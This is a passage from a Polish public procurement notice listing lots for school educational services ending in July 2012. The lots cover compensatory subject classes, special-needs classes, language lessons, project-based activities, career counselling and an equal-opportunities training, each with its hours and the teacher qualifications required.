<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z języka polskiego z wykorzystaniem technologii informatycznej dla uczniów kl. V szkoły podstawowej: 33 godzin w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania języka polskiego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia wyrównawcze z języka polskiego z wykorzystaniem technologii informatycznej dla uczniów kl. VI szkoły podstawowej: 33 godzin w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania języka polskiego;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z języka polskiego z wykorzystaniem technologii informatycznej dla uczniów kl. VI szkoły podstawowej: 33 godzin w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania języka polskiego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia wyrównawcze z historii z wykorzystaniem technologii informatycznej dla uczniów kl. VI szkoły podstawowej: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania historii;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z historii z wykorzystaniem technologii informatycznej dla uczniów kl. VI szkoły podstawowej: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania historii;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia wyrównawcze z przyrody z wykorzystaniem technologii informatycznej dla uczniów kl. VI szkoły podstawowej: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania przyrody;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z przyrody z wykorzystaniem technologii informatycznej dla uczniów kl. VI szkoły podstawowej: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania przyrody;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zajęcia wyrównawcze z historii z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania historii i doświadczenie w realizacji nowej podstawy programowej z historii w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z historii z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania historii i doświadczenie w realizacji nowej podstawy programowej z historii w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zajęcia wyrównawcze z języka polskiego z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 66 godzin w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania języka polskiego i doświadczenie w realizacji nowej podstawy programowej z języka polskiego w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z języka polskiego z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 66 godzin w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania języka polskiego i doświadczenie w realizacji nowej podstawy programowej z języka polskiego w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zajęcia wyrównawcze z matematyki z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 66 godzin w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania matematyki i doświadczenie w realizacji nowej podstawy programowej z matematyki w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z matematyki z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 66 godzin w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania matematyki i doświadczenie w realizacji nowej podstawy programowej z matematyki w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zajęcia wyrównawcze z geografii z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania geografii i doświadczenie w realizacji nowej podstawy programowej z geografii w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z geografii z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania geografii i doświadczenie w realizacji nowej podstawy programowej z geografii w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zajęcia wyrównawcze z fizyki z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania fizyki i doświadczenie w realizacji nowej podstawy programowej z fizyki w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z fizyki z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania fizyki i doświadczenie w realizacji nowej podstawy programowej z fizyki w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zajęcia wyrównawcze z chemii z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania chemii i doświadczenie w realizacji nowej podstawy programowej z chemii w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z chemii z wykorzystaniem technologii informatycznej dla uczniów kl. III gimnazjum: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania chemii i doświadczenie w realizacji nowej podstawy programowej z chemii w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zajęcia wyrównawcze z biologii z wykorzystaniem technologii informatycznej dla uczniów kl.III gimnazjum: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania biologii i doświadczenie w realizacji nowej podstawy programowej z biologii w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wyrównawcze z biologii z wykorzystaniem technologii informatycznej dla uczniów kl.III gimnazjum: 33 godziny w 1 grupie; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania biologii i doświadczenie w realizacji nowej podstawy programowej z biologii w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zajęcia specjalistyczne dla uczniów upośledzonych w stopniu umiarkowanym z kl. I-VI szkoły podstawowej: 56 godzin w 1 grupie; wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje z oligofrenopedagogiki i doświadczenie w pracy z uczniami upośledzonymi umysłowo w stopniu umiarkowanym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia specjalistyczne dla uczniów upośledzonych w stopniu umiarkowanym z kl. I-VI szkoły podstawowej: 56 godzin w 1 grupie; wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje z oligofrenopedagogiki i doświadczenie w pracy z uczniami upośledzonymi umysłowo w stopniu umiarkowanym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zajęcia specjalistyczne dla uczniów upośledzonych w stopniu lekkim i uczniów niedosłyszących z kl. I-VI szkoły podstawowej: 56 godzin w 1 grupie; wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje z oligofrenopedagogiki, surdopedagogiki i doświadczenie w pracy z uczniami upośledzonymi umysłowo w stopniu lekkim i uczniami niedosłyszącymi;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia specjalistyczne dla uczniów upośledzonych w stopniu lekkim i uczniów niedosłyszących z kl. I-VI szkoły podstawowej: 56 godzin w 1 grupie; wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje z oligofrenopedagogiki, surdopedagogiki i doświadczenie w pracy z uczniami upośledzonymi umysłowo w stopniu lekkim i uczniami niedosłyszącymi;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zajęcia specjalistyczne dla uczniów upośledzonych w stopniu lekkim z kl. I-III gimnazjum: 56 godzin w 1 grupie; wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje z oligofrenopedagogiki i doświadczenie w pracy z uczniami upośledzonymi umysłowo w stopniu lekkim;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia specjalistyczne dla uczniów upośledzonych w stopniu lekkim z kl. I-III gimnazjum: 56 godzin w 1 grupie; wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje z oligofrenopedagogiki i doświadczenie w pracy z uczniami upośledzonymi umysłowo w stopniu lekkim;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zajęcia z chemii rozwijające kompetencje kluczowe prowadzone metodą projektów edukacyjnych dla uczniów gimnazjum: 60 godzin (6 projektów po 10 godzin) dla 6 grup; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania chemii i doświadczenie w realizacji nowej podstawy programowej z chemii w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z chemii rozwijające kompetencje kluczowe prowadzone metodą projektów edukacyjnych dla uczniów gimnazjum: 60 godzin (6 projektów po 10 godzin) dla 6 grup; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania chemii i doświadczenie w realizacji nowej podstawy programowej z chemii w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zajęcia z biologii rozwijające kompetencje kluczowe prowadzone metodą projektów edukacyjnych dla uczniów gimnazjum: 30 godzin (3 projekty po 10 godzin) dla 3 grup; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania biologii i doświadczenie w realizacji nowej podstawy programowej z biologii w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z biologii rozwijające kompetencje kluczowe prowadzone metodą projektów edukacyjnych dla uczniów gimnazjum: 30 godzin (3 projekty po 10 godzin) dla 3 grup; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania biologii i doświadczenie w realizacji nowej podstawy programowej z biologii w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zajęcia z fizyki rozwijające kompetencje kluczowe prowadzone metodą projektów edukacyjnych dla uczniów gimnazjum: 30 godzin (3 projekty po 10 godzin) dla 3 grup; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania fizyki i doświadczenie w realizacji nowej podstawy programowej z fizyki w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z fizyki rozwijające kompetencje kluczowe prowadzone metodą projektów edukacyjnych dla uczniów gimnazjum: 30 godzin (3 projekty po 10 godzin) dla 3 grup; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania fizyki i doświadczenie w realizacji nowej podstawy programowej z fizyki w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zajęcia z geografii rozwijające kompetencje kluczowe prowadzone metodą projektów edukacyjnych dla uczniów gimnazjum: 30 godzin (3 projekty po 10 godzin) dla 3 grup; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania geografii i doświadczenie w realizacji nowej podstawy programowej z geografii w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z geografii rozwijające kompetencje kluczowe prowadzone metodą projektów edukacyjnych dla uczniów gimnazjum: 30 godzin (3 projekty po 10 godzin) dla 3 grup; wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie nauczania geografii i doświadczenie w realizacji nowej podstawy programowej z geografii w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka angielskiego dla kl. I-III szkoły podstawowej - 78 godzin w 6 grupach, 13 godzin dla jednej grupy wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka angielskiego;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka angielskiego dla kl. I-III szkoły podstawowej - 78 godzin w 6 grupach, 13 godzin dla jednej grupy wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka angielskiego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka angielskiego dla kl. IV-VI szkoły podstawowej - 52 godziny w 4 grupach, 13 godzin dla jednej grupy  wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka angielskiego;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka angielskiego dla kl. IV-VI szkoły podstawowej - 52 godziny w 4 grupach, 13 godzin dla jednej grupy  wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka angielskiego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka angielskiego dla kl. I-III gimnazjum - 78 godzin w 6 grupach, 13 godzin dla jednej grupy wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka angielskiego i doświadczenie w realizacji nowej podstawy programowej z języka angielskiego w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka angielskiego dla kl. I-III gimnazjum - 78 godzin w 6 grupach, 13 godzin dla jednej grupy wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka angielskiego i doświadczenie w realizacji nowej podstawy programowej z języka angielskiego w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka rosyjskiego dla kl. IV-VI szkoły podstawowej - 52 godziny w 4 grupach, 13 godzin dla jednej grupy  wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka rosyjskiego;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka rosyjskiego dla kl. IV-VI szkoły podstawowej - 52 godziny w 4 grupach, 13 godzin dla jednej grupy  wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka rosyjskiego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka rosyjskiego dla kl. I-III gimnazjum - 78 godzin w 6 grupach, 13 godzin dla jednej grupy wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka rosyjskiego i doświadczenie w realizacji nowej podstawy programowej z języka rosyjskiego w gimnazjum;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające kompetencje porozumiewania się w językach obcych - zajęcia z języka rosyjskiego dla kl. I-III gimnazjum - 78 godzin w 6 grupach, 13 godzin dla jednej grupy wymagane jest, by prowadzący te zajęcia posiadał kwalifikacje w zakresie prowadzenia zajęć z języka rosyjskiego i doświadczenie w realizacji nowej podstawy programowej z języka rosyjskiego w gimnazjum;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Każdy wielki był niewielki - zajęcia budzące wiarę we własne możliwości i motywację do nauki dla kl. I szkoły podstawowej - praca metodą projektów, 2 projekty po 10 godzin dla 1 grupy, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesnoszkolnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Każdy wielki był niewielki - zajęcia budzące wiarę we własne możliwości i motywację do nauki dla kl. I szkoły podstawowej - praca metodą projektów, 2 projekty po 10 godzin dla 1 grupy, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesnoszkolnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Każdy wielki był niewielki- zajęcia budzące wiarę we własne możliwości i motywację do nauki dla kl. II szkoły podstawowej - praca metodą projektów, 2 projekty po 10 godzin dla 1 grupy, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesnoszkolnej;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Każdy wielki był niewielki - zajęcia budzące wiarę we własne możliwości i motywację do nauki dla kl. II szkoły podstawowej - praca metodą projektów, 2 projekty po 10 godzin dla 1 grupy, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesnoszkolnej;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Każdy wielki był niewielki - zajęcia budzące wiarę we własne możliwości i motywację do nauki dla kl. III a szkoły podstawowej - praca metodą projektów, 2 projekty po 10 godzin dla 1 grupy, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesnoszkolnej;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Każdy wielki był niewielki - zajęcia budzące wiarę we własne możliwości i motywację do nauki dla kl. III a szkoły podstawowej - praca metodą projektów, 2 projekty po 10 godzin dla 1 grupy, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesnoszkolnej;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Każdy wielki był niewielki - zajęcia budzące wiarę we własne możliwości i motywację do nauki dla kl. III b szkoły podstawowej - praca metodą projektów, 2 projekty po 10 godzin dla 1 grupy, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesnoszkolnej;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Każdy wielki był niewielki- zajęcia budzące wiarę we własne możliwości i motywację do nauki dla kl. III b szkoły podstawowej - praca metodą projektów, 2 projekty po 10 godzin dla 1 grupy, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie edukacji wczesnoszkolnej;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> SZOK - zajęcia z doradztwa zawodowego i wyboru dalszej ścieżki edukacyjnej dla uczniów gimnazjum - 72 godziny zajęć, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie doradztwa zawodowego;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SZOK - zajęcia z doradztwa zawodowego i wyboru dalszej ścieżki edukacyjnej dla uczniów gimnazjum - 72 godziny zajęć, wymagane jest by prowadzący te zajęcia posiadał kwalifikacje w zakresie doradztwa zawodowego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Zakup usługi szkoleniowej: Szkolenie na temat równości szans kobiet i mężczyzn dla członków kadry realizującej projekt - szkolenie z zakresu przeciwdziałania stereotypom i dyskryminacji ze względu na wiek i płeć i inne cechy, np. niepełnosprawności - szkolenie w wymiarze 8 godzin + materiały szkoleniowe; wymagane jest by prowadzący to szkolenie posiadał kwalifikacje w zakresie szkoleń w w/w tematyce;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup usługi szkoleniowej: Szkolenie na temat równości szans kobiet i mężczyzn dla członków kadry realizującej projekt - szkolenie z zakresu przeciwdziałania stereotypom i dyskryminacji ze względu na wiek i płeć i inne cechy, np. niepełnosprawności - szkolenie w wymiarze 8 godzin + materiały szkoleniowe; wymagane jest by prowadzący to szkolenie posiadał kwalifikacje w zakresie szkoleń w w/w tematyce;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie zawodowe - 50</li>
</ul>
</li>
</ul><br>
